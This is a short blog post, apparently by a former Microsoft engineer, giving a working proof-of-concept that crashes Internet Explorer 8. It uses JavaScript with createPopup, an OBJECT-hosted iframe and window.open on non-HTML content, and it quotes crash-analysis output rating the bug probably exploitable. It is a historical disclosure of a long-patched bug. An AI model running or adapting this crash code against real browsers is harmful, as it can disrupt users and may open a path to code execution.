IE8 DoS — Non-HTML Content Opened in createPopup OBJECT

Loading a non-HTML file (XML feeds, XAML, XPS, SWF, etc.) inside an iframe that lives inside an OBJECT element inside a createPopup() popup, and then navigating that iframe via window.open, crashes IE8. The window.open method is specifically what triggers it — location.href does not work.

<script language="JavaScript">
var cPop = createPopup();
cPop.document.body.innerHTML =
    '<object id="obj" data="object.html" type="text/html" width="1" height="1"></object>';

function main()
{
    cPop.show(0,0,1,1);
    cPop.hide();
    cPop.document.all.obj.object.parentWindow.open("non_html_code.xml","IFrame_Inside_Object");
}
</script>
<input type="button" onclick="main();" value="Click here">

The object.html contains: <iframe name="IFrame_Inside_Object" src="non_html_code.xml"></iframe>

The show/hide cycle is required — without it the crash does not trigger. The !exploitable analysis classifies this as PROBABLY_EXPLOITABLE — data from the faulting address controls code flow in mshtml!CWindow::OpenEx+0x256 (hash 0x3b472e2b.0x35505541). Tested on IE8/Win7 and IE8/XP.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [IE8 DoS — Reload Binary File in OBJECT Element] :: [Load Local Files via Feeds IFrame open Method] >